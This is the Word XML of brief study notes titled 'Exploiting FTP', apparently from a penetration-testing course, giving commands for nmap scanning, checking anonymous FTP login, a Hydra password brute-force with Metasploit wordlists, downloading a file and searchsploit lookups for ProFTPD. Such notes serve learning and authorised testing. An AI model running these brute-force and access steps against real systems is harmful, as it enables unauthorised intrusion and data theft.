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8BB66" w14:textId="26B0ED1A" w:rsidR="00853ABF" w:rsidRPr="00ED6A02" w:rsidRDefault="00ED6A02">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED6A02">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exploiting FTP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A907210" w14:textId="24D95664" w:rsidR="00ED6A02" w:rsidRDefault="00CC11CB">
      <w:r>
        <w:t>File transfer protocol =21</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33E3D65E" w14:textId="77777777" w:rsidR="00CC11CB" w:rsidRDefault="00CC11CB"/>
    <w:p w14:paraId="1EE097CB" w14:textId="73CF9392" w:rsidR="00CC11CB" w:rsidRDefault="00CC11CB">
      <w:r>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>whenever</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> you buy domain the hosting company </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>provide</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> you </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>with  c</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> panel or ftp credential to upload the website files or data to the actual directory of the webserver.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B39ABD7" w14:textId="361A9A96" w:rsidR="00CC11CB" w:rsidRDefault="0082745E">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38722E45" w14:textId="0B085541" w:rsidR="00392B3B" w:rsidRPr="00392B3B" w:rsidRDefault="00392B3B">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00392B3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00392B3B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63697507" w14:textId="577D93A0" w:rsidR="0082745E" w:rsidRDefault="0082745E">
      <w:r>
        <w:t xml:space="preserve">In some </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cases</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the FTP</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>allow</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidRPr="0082745E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Anonymous</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0082745E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> login.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280439C3" w14:textId="77777777" w:rsidR="0082745E" w:rsidRDefault="0082745E"/>
    <w:p w14:paraId="199B809A" w14:textId="66186017" w:rsidR="00CC11CB" w:rsidRPr="00521AC8" w:rsidRDefault="00521AC8">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00521AC8">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>DEMO:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C40668" w14:textId="46D2BF7D" w:rsidR="00521AC8" w:rsidRDefault="00670BC6">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Ifconfig</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2ACED736" w14:textId="674E17CB" w:rsidR="00670BC6" w:rsidRDefault="00245295">
      <w:r>
        <w:t xml:space="preserve">Nmap -s V </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="426E1E08" w14:textId="77777777" w:rsidR="00245295" w:rsidRDefault="00245295"/>
    <w:p w14:paraId="5DEEE0CE" w14:textId="20F61556" w:rsidR="00245295" w:rsidRPr="00245295" w:rsidRDefault="00245295">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00245295">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Check for </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00245295">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>anonymous :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="79723F62" w14:textId="3F5F4B86" w:rsidR="00245295" w:rsidRDefault="00245295">
      <w:r>
        <w:t xml:space="preserve">ftp </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6809D69A" w14:textId="3917A8C2" w:rsidR="00245295" w:rsidRDefault="00245295">
      <w:r w:rsidRPr="00245295">
        <w:t>anonymous</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552A56C5" w14:textId="77777777" w:rsidR="00245295" w:rsidRDefault="00245295"/>
    <w:p w14:paraId="0DA6ECD6" w14:textId="25ABFA25" w:rsidR="00245295" w:rsidRDefault="00245295">
      <w:r>
        <w:t>ls -la /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/scripts/ |grep ftp-*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C46C360" w14:textId="1CE9B61C" w:rsidR="00245295" w:rsidRDefault="00245295">
      <w:r>
        <w:t>#</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>show</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> the scripts of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> used for ftp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC5C1BB" w14:textId="77777777" w:rsidR="00245295" w:rsidRDefault="00245295"/>
    <w:p w14:paraId="7BE108F9" w14:textId="540F785E" w:rsidR="00AB5D8D" w:rsidRPr="00AB5D8D" w:rsidRDefault="00AB5D8D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00AB5D8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bruteforce</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00AB5D8D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AB2A21" w14:textId="5B32D253" w:rsidR="00AB5D8D" w:rsidRDefault="00AB5D8D">
      <w:r>
        <w:t xml:space="preserve">Hydra -L </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/share/Metasploit-framework/data/wordlists/common-users.txt  -P  </w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/share/Metasploit-framework/data/wordlists/</w:t>
      </w:r>
      <w:r>
        <w:t>unix-pass.txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -t 4 ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="042EB1AC" w14:textId="77777777" w:rsidR="00AB5D8D" w:rsidRDefault="00AB5D8D"/>
    <w:p w14:paraId="7C77F40E" w14:textId="00E023BE" w:rsidR="00AB5D8D" w:rsidRPr="00CE680A" w:rsidRDefault="00CE680A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE680A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Login using the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CE680A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>finded</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CE680A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> passwords:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D021093" w14:textId="1B0C20D7" w:rsidR="00CE680A" w:rsidRDefault="00CE680A">
      <w:r>
        <w:t xml:space="preserve">ftp </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>target_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="387E0224" w14:textId="7AD53098" w:rsidR="00CE680A" w:rsidRDefault="00CE680A">
      <w:r>
        <w:t>get file_to_download.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D32E7FD" w14:textId="11922D77" w:rsidR="00CE680A" w:rsidRDefault="00CE680A">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="484B0478" w14:textId="15FFC7FC" w:rsidR="00CE680A" w:rsidRDefault="00CE680A">
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">cat  </w:t>
      </w:r>
      <w:r>
        <w:t>file_to_download.txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="0DF8A68C" w14:textId="77777777" w:rsidR="008773A4" w:rsidRDefault="008773A4"/>
    <w:p w14:paraId="5C485186" w14:textId="353F2F1B" w:rsidR="008773A4" w:rsidRDefault="008773A4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -s V </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>taeget_ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="77E4D66B" w14:textId="77777777" w:rsidR="008773A4" w:rsidRDefault="008773A4"/>
    <w:p w14:paraId="7FECF47B" w14:textId="3DA8A3F1" w:rsidR="008773A4" w:rsidRDefault="008773A4">
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>searchsploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ProFTPD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4748C442" w14:textId="4545C85E" w:rsidR="008773A4" w:rsidRDefault="008773A4"/>
    <w:p w14:paraId="75F2432D" w14:textId="77777777" w:rsidR="008773A4" w:rsidRPr="00245295" w:rsidRDefault="008773A4"/>
    <w:sectPr w:rsidR="008773A4" w:rsidRPr="00245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43"/>
    <w:rsid w:val="00245295"/>
    <w:rsid w:val="00392B3B"/>
    <w:rsid w:val="003B5E83"/>
    <w:rsid w:val="00521AC8"/>
    <w:rsid w:val="00551663"/>
    <w:rsid w:val="00595B1E"/>
    <w:rsid w:val="00670BC6"/>
    <w:rsid w:val="0079242D"/>
    <w:rsid w:val="00792643"/>
    <w:rsid w:val="007A3461"/>
    <w:rsid w:val="0082745E"/>
    <w:rsid w:val="00853ABF"/>
    <w:rsid w:val="008773A4"/>
    <w:rsid w:val="0095036D"/>
    <w:rsid w:val="00AB5D8D"/>
    <w:rsid w:val="00BC5567"/>
    <w:rsid w:val="00CC11CB"/>
    <w:rsid w:val="00CE680A"/>
    <w:rsid w:val="00ED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8CA1"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{19D13098-46C7-4EF5-AEC2-9DA32D78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23</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-09-17T05:05:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-09-17T05:26:00Z</dcterms:modified>
</cp:coreProperties>
</file>